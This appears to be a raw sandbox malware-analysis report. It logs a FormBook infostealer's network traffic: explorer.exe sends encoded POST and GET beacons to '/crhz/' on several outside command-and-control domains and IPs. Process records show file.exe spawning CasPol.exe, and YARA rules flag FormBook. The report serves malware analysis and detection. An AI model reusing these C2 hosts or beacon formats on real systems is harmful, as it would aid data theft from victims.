                                                                content-type: text/html; charset=UTF-8
                                                                link: <https://suachuadienlanh247.com/wp-json/>; rel="https://api.w.org/"
                                                                content-encoding: gzip
                                                                vary: Accept-Encoding
                                                                transfer-encoding: chunked
                                                                date: Mon, 30 Jan 2023 13:53:02 GMT
                                                                server: LiteSpeed
                                                                connection: close


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                15 | 192.168.2.6 | 49733 | 103.221.223.104 | 80 | C:\Windows\explorer.exe
                                                                Timestamp | kBytes transferred | Direction | Data
                                                                Jan 30, 2023 14:53:05.346477032 CET | 210 | OUT | GET /crhz/?ghJ5T=CCCEekJcxP1BHV4uutXMBlMorQncoYcW7RlEC0I+F0KDkaobIF+zubJ5fpyHcR0fDKGG4SO4PI1fmloML0V8WxzpJC6D/H2QJAQp0zm+InHs&90Z5=-8rTZKCzAmXPlO HTTP/1.1
                                                                Host: www.suachuadienlanh247.com
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Jan 30, 2023 14:53:05.842413902 CET | 211 | IN | HTTP/1.1 301 Moved Permanently
                                                                expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                cache-control: no-cache, must-revalidate, max-age=0
                                                                content-type: text/html; charset=UTF-8
                                                                x-redirect-by: WordPress
                                                                location: http://suachuadienlanh247.com/crhz/?ghJ5T=CCCEekJcxP1BHV4uutXMBlMorQncoYcW7RlEC0I+F0KDkaobIF+zubJ5fpyHcR0fDKGG4SO4PI1fmloML0V8WxzpJC6D/H2QJAQp0zm+InHs&90Z5=-8rTZKCzAmXPlO
                                                                content-length: 0
                                                                date: Mon, 30 Jan 2023 13:53:05 GMT
                                                                server: LiteSpeed
                                                                connection: close


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                16 | 192.168.2.6 | 49734 | 76.223.105.230 | 80 | C:\Windows\explorer.exe
                                                                Timestamp | kBytes transferred | Direction | Data
                                                                Jan 30, 2023 14:53:10.918714046 CET | 212 | OUT | POST /crhz/ HTTP/1.1
                                                                Host: www.hvlandscapes.biz
                                                                Connection: close
                                                                Content-Length: 191
                                                                Cache-Control: no-cache
                                                                Origin: http://www.hvlandscapes.biz
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://www.hvlandscapes.biz/crhz/
                                                                Accept-Language: en-US
                                                                Accept-Encoding: gzip, deflate
                                                                Jan 30, 2023 14:53:10.944618940 CET | 212 | IN | HTTP/1.1 301 Moved Permanently
                                                                location: http://hvlandscapes.biz/crhz/
                                                                vary: Accept-Encoding
                                                                server: DPS/2.0.0-beta+sha-0ec0b2a
                                                                x-version: 0ec0b2a
                                                                x-siteid: eu-central-1
                                                                set-cookie: dps_site_id=eu-central-1; path=/
                                                                date: Mon, 30 Jan 2023 13:53:10 GMT
                                                                keep-alive: timeout=5
                                                                transfer-encoding: chunked
                                                                connection: close
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                17 | 192.168.2.6 | 49735 | 76.223.105.230 | 80 | C:\Windows\explorer.exe
                                                                Timestamp | kBytes transferred | Direction | Data
                                                                Jan 30, 2023 14:53:13.465934992 CET | 215 | OUT | POST /crhz/ HTTP/1.1
                                                                Host: www.hvlandscapes.biz
                                                                Connection: close
                                                                Content-Length: 1455
                                                                Cache-Control: no-cache
                                                                Origin: http://www.hvlandscapes.biz
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://www.hvlandscapes.biz/crhz/
                                                                Accept-Language: en-US
                                                                Accept-Encoding: gzip, deflate
                                                                Jan 30, 2023 14:53:13.489326954 CET | 215 | IN | HTTP/1.1 301 Moved Permanently
                                                                location: http://hvlandscapes.biz/crhz/
                                                                vary: Accept-Encoding
                                                                server: DPS/2.0.0-beta+sha-0ec0b2a
                                                                x-version: 0ec0b2a
                                                                x-siteid: eu-central-1
                                                                set-cookie: dps_site_id=eu-central-1; path=/
                                                                date: Mon, 30 Jan 2023 13:53:13 GMT
                                                                keep-alive: timeout=5
                                                                transfer-encoding: chunked
                                                                connection: close
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                18 | 192.168.2.6 | 49736 | 76.223.105.230 | 80 | C:\Windows\explorer.exe
                                                                Timestamp | kBytes transferred | Direction | Data
                                                                Jan 30, 2023 14:53:16.479351044 CET | 216 | OUT | GET /crhz/?90Z5=-8rTZKCzAmXPlO&ghJ5T=tmPv/9YflmeFyaovhpy86TX5rNY2iNLCfFTw46C4YL4FjsvtgGKrRmf5O7NIQw/qRR8QJqKEWoluew4y5+XfIT1Onmlscs+4wa7bdRvmZkTM HTTP/1.1
                                                                Host: www.hvlandscapes.biz
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Jan 30, 2023 14:53:16.502583981 CET | 217 | IN | HTTP/1.1 301 Moved Permanently
                                                                location: http://hvlandscapes.biz/crhz/?90Z5=-8rTZKCzAmXPlO&ghJ5T=tmPv/9YflmeFyaovhpy86TX5rNY2iNLCfFTw46C4YL4FjsvtgGKrRmf5O7NIQw/qRR8QJqKEWoluew4y5+XfIT1Onmlscs+4wa7bdRvmZkTM
                                                                vary: Accept-Encoding
                                                                server: DPS/2.0.0-beta+sha-0ec0b2a
                                                                x-version: 0ec0b2a
                                                                x-siteid: eu-central-1
                                                                set-cookie: dps_site_id=eu-central-1; path=/
                                                                date: Mon, 30 Jan 2023 13:53:16 GMT
                                                                keep-alive: timeout=5
                                                                transfer-encoding: chunked
                                                                connection: close
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                19 | 192.168.2.6 | 49737 | 81.169.145.72 | 80 | C:\Windows\explorer.exe
                                                                Timestamp | kBytes transferred | Direction | Data
                                                                Jan 30, 2023 14:53:21.559890985 CET | 218 | OUT | POST /crhz/ HTTP/1.1
                                                                Host: www.frogair.online
                                                                Connection: close
                                                                Content-Length: 191
                                                                Cache-Control: no-cache
                                                                Origin: http://www.frogair.online
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://www.frogair.online/crhz/
                                                                Accept-Language: en-US
                                                                Accept-Encoding: gzip, deflate
                                                                Jan 30, 2023 14:53:21.582130909 CET | 219 | IN | HTTP/1.1 404 Not Found
                                                                Date: Mon, 30 Jan 2023 13:53:21 GMT
                                                                Server: Apache/2.4.54 (Unix)
                                                                Content-Length: 196
                                                                Connection: close
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                2 | 192.168.2.6 | 49714 | 185.151.199.52 | 80 | C:\Windows\explorer.exe
                                                                Timestamp | kBytes transferred | Direction | Data
                                                                Jan 30, 2023 14:52:17.967179060 CET | 103 | OUT | POST /crhz/ HTTP/1.1
                                                                Host: www.n-r-eng.com
                                                                Connection: close
                                                                Content-Length: 1455
                                                                Cache-Control: no-cache
                                                                Origin: http://www.n-r-eng.com
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://www.n-r-eng.com/crhz/
                                                                Accept-Language: en-US
                                                                Accept-Encoding: gzip, deflate
                                                                Data Ascii: ghJ5T=D0VHMBBMIqAyypugR79ZjtqTvilx662_4OEZpvNEAXIlFdp9FA2dz6diBHhlpEFHVcGkKsUtqBZZeFMrB1e94uAyCRuj8KFZYYMWB6pSB1IJE2vy(KX_(tg1tOsDk9CRuS(EsoMQLB1sXUNGJnhGouJ89JEtQBLJPp82PJfxG06ooatXSibaKsUc0OUVJEmr6i~owR9IUlki6bPpvSQGZ9h9JPjyfJ9mV9fYcIBkoDuezoZY5bpGRsUWx7Mti9MNaDrKW2vCH2iON7LG2QRPOVQb0x43aHvY6GKlCZUVlhyk~x~o8H32Ohm4T0JKpkwZXCnIHDwazkrzjNMubJQ2g21rojqwbGNuzrE_W75fovGg6uVeZVU4HBD5QigmDvEZ69UGsBA6PgfXkzdQkmHHvWdDVYop(jpUZbqax7bwNCrUS6e8~jRlGirx0IOUxlKAWA1XKrDnKa~KqTRM3xl8~jajxSv_Fwt5szJFkuelqjgKCAKSO0z5UyM-ttt2Cs2Mhf8nevgCNDt395xwwsmmnRt0wqK7UmMmEUoYFCgkWQsqA8iMfrJc1Th-1EcazNFXUEV_XuKKEm9c0Ku9DitDDqECGq0MMAuD~i(u2vDG9N3ZZjoaXgTYfmvpB5vOUHoKO3EDzrM84a64HvxbsaSvhgYzZ2PNW0VjLQc7GXQBHzNoRQ~SVs3ZZxjR5FWuV29ZKFVDgVwKSgBU0K~GhsKyz4nYxIU3uJYZYZaCUzLJlBmLFOoV99FfhLRxNv1BbwALLWFmWqQIVUej3TE0tABk4oeywwBceTRCOycRlFrVnxyq3UqXVfKyPBJxsZraOETa2ahYautPC2XM4hGPDk1Rrs96FrDWEFX-~_lvkX0aMMJWYEtley(FyyUy10vn5Kuuel8FXmEFdC9s~fLfUyFk7TJvXF5-7CLBj_HmQyz4Ihq3NZLD(MvEAnzxdgU1txlIklnkdYH64dvJigsAf1XT2QwSer5ZWYpapKtm0xcHKqwU8uk76VeXBwNXAp(57Ug-4jWPD2z99DxWmTQ9VkoFVjZWGRBlg0DldRljrSTrFRMSGRQEp_QzhnX6693u8njiGnHuZSbtTyj65y~J(X(ArmRaclszrqj8oK2yhU0HCQuGIdpGYYCCBKyPdAnFwDPxBQVJSJ8YLiryo0WXhJW2DUrsLfsjNyb0c_jdVmNI7KRBNHk2CBeDNd9gL27s7UEf30QUgU2CRFq-Fa7ejfLHMWMu1EZpg1zxxaQ4EZYdp5i6rjQCX247bDDxkYKskg7h4lFnEQmZuENbqZRr5n4QxwQcm0uofZGvPX5ADXMrC2hSfmY1N3VZZntbUv9sgTMGhGV_JiPWgBnfkVCIAl8yJci_GFzGRAXqun6Hvxzej28Y1q38udoSg3CBFs1pAVm8WpB0Kj~UHoIBN0sinILVnXYJ1ubbXrJEbnt9ReE.
                                                                Jan 30, 2023 14:52:18.047092915 CET  104                 IN         HTTP/1.1 301 Moved Permanently
                                                                Server: nginx
                                                                Date: Mon, 30 Jan 2023 13:52:18 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 162
                                                                Connection: close
                                                                Location: https://www.n-r-eng.com/crhz/
                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                20          192.168.2.6  49738        81.169.145.72   80                C:\Windows\explorer.exe
                                                                Timestamp                            kBytes transferred  Direction  Data
                                                                Jan 30, 2023 14:53:24.108309984 CET  221                 OUT        POST /crhz/ HTTP/1.1
                                                                Host: www.frogair.online
                                                                Connection: close
                                                                Content-Length: 1455
                                                                Cache-Control: no-cache
                                                                Origin: http://www.frogair.online
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://www.frogair.online/crhz/
                                                                Accept-Language: en-US
                                                                Accept-Encoding: gzip, deflate
                                                                Jan 30, 2023 14:53:24.129245043 CET  222                 IN         HTTP/1.1 404 Not Found
                                                                Date: Mon, 30 Jan 2023 13:53:24 GMT
                                                                Server: Apache/2.4.54 (Unix)
                                                                Content-Length: 196
                                                                Connection: close
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                21          192.168.2.6  49739        81.169.145.72   80                C:\Windows\explorer.exe
                                                                Timestamp                            kBytes transferred  Direction  Data
                                                                Jan 30, 2023 14:53:26.660531998 CET  222                 OUT        GET /crhz/?ghJ5T=iycDOFv4tLFlCihz1M/bkpzttTI3wOwIoAcOv31GIYKsRKZ8f8EzkP6Z56SPUyztaOnMa+iauXtsUeY/SnJCIVqiEyUfq8kF6FnqNv3PiNZk&90Z5=-8rTZKCzAmXPlO HTTP/1.1
                                                                Host: www.frogair.online
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Jan 30, 2023 14:53:26.680932045 CET  223                 IN         HTTP/1.1 404 Not Found
                                                                Date: Mon, 30 Jan 2023 13:53:26 GMT
                                                                Server: Apache/2.4.54 (Unix)
                                                                Content-Length: 196
                                                                Connection: close
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                22          192.168.2.6  49741        163.44.198.50   80                C:\Windows\explorer.exe
                                                                Timestamp                            kBytes transferred  Direction  Data
                                                                Jan 30, 2023 14:53:32.629285097 CET  231                 OUT        POST /crhz/ HTTP/1.1
                                                                Host: www.mitsubangsaen.online
                                                                Connection: close
                                                                Content-Length: 191
                                                                Cache-Control: no-cache
                                                                Origin: http://www.mitsubangsaen.online
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://www.mitsubangsaen.online/crhz/
                                                                Accept-Language: en-US
                                                                Accept-Encoding: gzip, deflate
                                                                Data Ascii: ghJ5T=qoO5CdCa5IsO33mdYcBmKDNr9r7vV3QnOqGTzoIzHhTwUoGL7i3DNJEvYKS7qQIvutfPapB2~UNyA7TDEIJNf5elm7n2mdPZP-vRwBwf6OmspB6SySO2(fiozeX72Aue05VSz_VcfDRYO9F7rBGX9J1U~xEinbF2lkB40m4l99lJnre2Rm0_92U.
                                                                Jan 30, 2023 14:53:32.840301037 CET  231                 IN         HTTP/1.1 404 Not Found
                                                                Server: openresty
                                                                Date: Mon, 30 Jan 2023 13:53:32 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 166
                                                                Connection: close
                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>


                                                                Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                23          192.168.2.6  49742        163.44.198.50   80                C:\Windows\explorer.exe
                                                                Timestamp                            kBytes transferred  Direction  Data
                                                                Jan 30, 2023 14:53:35.352989912 CET  234                 OUT        POST /crhz/ HTTP/1.1
                                                                Host: www.mitsubangsaen.online
                                                                Connection: close
                                                                Content-Length: 1455
                                                                Cache-Control: no-cache
                                                                Origin: http://www.mitsubangsaen.online
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://www.mitsubangsaen.online/crhz/
                                                                Accept-Language: en-US
                                                                Accept-Encoding: gzip, deflate
                                                                Jan 30, 2023 14:53:35.555524111 CET  234                 IN         HTTP/1.1 404 Not Found
                                                                Server: openresty
                                                                Date: Mon, 30 Jan 2023 13:53:35 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 166
                                                                Connection: close
                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>


                                                                Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                24          192.168.2.6  49743        163.44.198.50   80                C:\Windows\explorer.exe
                                                                Timestamp                            kBytes transferred  Direction  Data
                                                                Jan 30, 2023 14:53:38.077323914 CET  235                 OUT        GET /crhz/?90Z5=-8rTZKCzAmXPlO&ghJ5T=nqmZBp2BkKhv5XD7JtliHBtb5J/nACgDXsCawcooXFLLWI2M3W+/ErAqTridlmxSnsXQQ5N94lpVUeLYPOpWHcmhsJP5m/P/TeGXz1gc+4vL HTTP/1.1
                                                                Host: www.mitsubangsaen.online
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Jan 30, 2023 14:53:38.284764051 CET  235                 IN         HTTP/1.1 404 Not Found
                                                                Server: openresty
                                                                Date: Mon, 30 Jan 2023 13:53:38 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 166
                                                                Connection: close
                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>


                                                                Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                3           192.168.2.6  49715        185.151.199.52  80                C:\Windows\explorer.exe
                                                                Timestamp                            kBytes transferred  Direction  Data
                                                                Jan 30, 2023 14:52:20.571834087 CET  104                 OUT        GET /crhz/?ghJ5T=O29nP3ATS/5Z6K6ZOqFFpve/mTBG7paw5+pol+lVZCotPeZJEV3KnsQwBw1FpEdPbpeQCJZSqBlkKVIQIQyw8OwcFAej9bBQBYULGapVGCZ8&90Z5=-8rTZKCzAmXPlO HTTP/1.1
                                                                Host: www.n-r-eng.com
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Jan 30, 2023 14:52:20.651880026 CET | 105 | IN | HTTP/1.1 301 Moved Permanently
                                                                Server: nginx
                                                                Date: Mon, 30 Jan 2023 13:52:20 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 162
                                                                Connection: close
                                                                Location: https://www.n-r-eng.com/crhz/?ghJ5T=O29nP3ATS/5Z6K6ZOqFFpve/mTBG7paw5+pol+lVZCotPeZJEV3KnsQwBw1FpEdPbpeQCJZSqBlkKVIQIQyw8OwcFAej9bBQBYULGapVGCZ8&90Z5=-8rTZKCzAmXPlO
                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                4 | 192.168.2.6 | 49719 | 164.88.201.214 | 80 | C:\Windows\explorer.exe
                                                                Timestamp | kBytes transferred | Direction | Data
                                                                Jan 30, 2023 14:52:25.997982025 CET | 130 | OUT | POST /crhz/ HTTP/1.1
                                                                Host: www.sandpiper-apts.com
                                                                Connection: close
                                                                Content-Length: 191
                                                                Cache-Control: no-cache
                                                                Origin: http://www.sandpiper-apts.com
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://www.sandpiper-apts.com/crhz/
                                                                Accept-Language: en-US
                                                                Accept-Encoding: gzip, deflate
                                                                Data Ascii: ghJ5T=GPv4Bxu9kxaEiIuKrJ7rc1Ar(yLW3T6NB0UFCRS0PneWgwtxtcCbg530ZZbIKHijqZv0TyR5QUg-wVqTPBPxYyIflEunJMdIrZlxh1KTmXFiZUHvKogcpkUT(HqSRkpkPNXWlLf9pGLl0BY2rZiiAa94fkWPbaSK9xjUDp9wu-Ahquhn07aO7dA.
                                                                Jan 30, 2023 14:52:26.207703114 CET | 130 | IN | HTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Mon, 30 Jan 2023 13:52:26 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 146
                                                                Connection: close
                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                5 | 192.168.2.6 | 49720 | 164.88.201.214 | 80 | C:\Windows\explorer.exe
                                                                Timestamp | kBytes transferred | Direction | Data
                                                                Jan 30, 2023 14:52:28.798149109 CET | 133 | OUT | POST /crhz/ HTTP/1.1
                                                                Host: www.sandpiper-apts.com
                                                                Connection: close
                                                                Content-Length: 1455
                                                                Cache-Control: no-cache
                                                                Origin: http://www.sandpiper-apts.com
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://www.sandpiper-apts.com/crhz/
                                                                Accept-Language: en-US
                                                                Accept-Encoding: gzip, deflate
                                                                Jan 30, 2023 14:52:29.004182100 CET | 133 | IN | HTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Mon, 30 Jan 2023 13:52:28 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 146
                                                                Connection: close
                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                6 | 192.168.2.6 | 49721 | 164.88.201.214 | 80 | C:\Windows\explorer.exe
                                                                Timestamp | kBytes transferred | Direction | Data
                                                                Jan 30, 2023 14:52:32.123620033 CET | 134 | OUT | GET /crhz/?90Z5=-8rTZKCzAmXPlO&ghJ5T=LNHYCELR2jrkl6ex9ablCycu9h3K7h+sZB96ERWJZAieoidRiLebg6j0RcHsFDDJ9r29OHFtYH9IplqsElTHfTI2iz39I/8+/5l0mHu4niU0 HTTP/1.1
                                                                Host: www.sandpiper-apts.com
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Jan 30, 2023 14:52:32.332516909 CET | 134 | IN | HTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Mon, 30 Jan 2023 13:52:32 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 146
                                                                Connection: close
                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                7 | 192.168.2.6 | 49723 | 18.138.206.213 | 80 | C:\Windows\explorer.exe
                                                                Timestamp | kBytes transferred | Direction | Data
                                                                Jan 30, 2023 14:52:37.581681967 CET | 142 | OUT | POST /crhz/ HTTP/1.1
                                                                Host: www.tf8dangky.online
                                                                Connection: close
                                                                Content-Length: 191
                                                                Cache-Control: no-cache
                                                                Origin: http://www.tf8dangky.online
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://www.tf8dangky.online/crhz/
                                                                Accept-Language: en-US
                                                                Accept-Encoding: gzip, deflate
                                                                Data Ascii: ghJ5T=1ZNm~q7dG2WPoWtQZCc-gpBz4XS9GHvOeebNUXW8MI1PoScFatunmDEp84zoi4~nXD5xqNiQrqVQ0IMyqYY_Ht(699Rd3Xh0pkagqN~tn8x_5ohzHvkXqlq56vq5n31qtuxpMCcCVu4usqVuamF6(EJ78wUgent5mkFZ0E9cNn1J6HYANmSqbVE.
                                                                Jan 30, 2023 14:52:37.781827927 CET | 143 | IN | HTTP/1.1 301 Moved Permanently
                                                                Server: openresty
                                                                Date: Mon, 30 Jan 2023 13:52:37 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 166
                                                                Connection: close
                                                                Location: https://www.tf8dangky.online/crhz/
                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                8 | 192.168.2.6 | 49724 | 18.138.206.213 | 80 | C:\Windows\explorer.exe
                                                                Timestamp | kBytes transferred | Direction | Data
                                                                Jan 30, 2023 14:52:40.298743963 CET | 145 | OUT | POST /crhz/ HTTP/1.1
                                                                Host: www.tf8dangky.online
                                                                Connection: close
                                                                Content-Length: 1455
                                                                Cache-Control: no-cache
                                                                Origin: http://www.tf8dangky.online
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://www.tf8dangky.online/crhz/
                                                                Accept-Language: en-US
                                                                Accept-Encoding: gzip, deflate
                                                                Jan 30, 2023 14:52:40.495204926 CET | 145 | IN | HTTP/1.1 301 Moved Permanently
                                                                Server: openresty
                                                                Date: Mon, 30 Jan 2023 13:52:40 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 166
                                                                Connection: close
                                                                Location: https://www.tf8dangky.online/crhz/
                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                9 | 192.168.2.6 | 49725 | 18.138.206.213 | 80 | C:\Windows\explorer.exe
                                                                Timestamp | kBytes transferred | Direction | Data
                                                                Jan 30, 2023 14:52:43.022285938 CET | 146 | OUT | GET /crhz/?ghJ5T=4blG9eK7alfY4URLGxkOib9O4UWCECbcMJ2fHD64T+pOqyJeQKS/uT906cjCl4jdAQhvn7mHg7wgiqcNtMEnJIHJg+N9005boEqGm8iwl7o0&90Z5=-8rTZKCzAmXPlO HTTP/1.1
                                                                Host: www.tf8dangky.online
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Jan 30, 2023 14:52:43.224649906 CET | 147 | IN | HTTP/1.1 301 Moved Permanently
                                                                Server: openresty
                                                                Date: Mon, 30 Jan 2023 13:52:43 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 166
                                                                Connection: close
                                                                Location: https://www.tf8dangky.online/crhz/?ghJ5T=4blG9eK7alfY4URLGxkOib9O4UWCECbcMJ2fHD64T+pOqyJeQKS/uT906cjCl4jdAQhvn7mHg7wgiqcNtMEnJIHJg+N9005boEqGm8iwl7o0&90Z5=-8rTZKCzAmXPlO
                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                Target ID:0
                                                                Start time:14:51:33
                                                                Start date:30/01/2023
                                                                Path:C:\Users\user\Desktop\file.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Users\user\Desktop\file.exe
                                                                Imagebase:0xf20000
                                                                File size:615936 bytes
                                                                MD5 hash:02DF8C86345D056735FA60116B93ED2B
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:.Net C# or VB.NET
                                                                Reputation:low

                                                                Target ID:1
                                                                Start time:14:51:34
                                                                Start date:30/01/2023
                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
                                                                Imagebase:0x270000
                                                                File size:107624 bytes
                                                                MD5 hash:F866FC1C2E928779C7119353C3091F0C
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:moderate

                                                                Target ID:2
                                                                Start time:14:51:34
                                                                Start date:30/01/2023
                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
                                                                Imagebase:0x980000
                                                                File size:107624 bytes
                                                                MD5 hash:F866FC1C2E928779C7119353C3091F0C
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.285119335.0000000000F10000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.285119335.0000000000F10000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.285119335.0000000000F10000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.281003915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.281003915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.281003915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
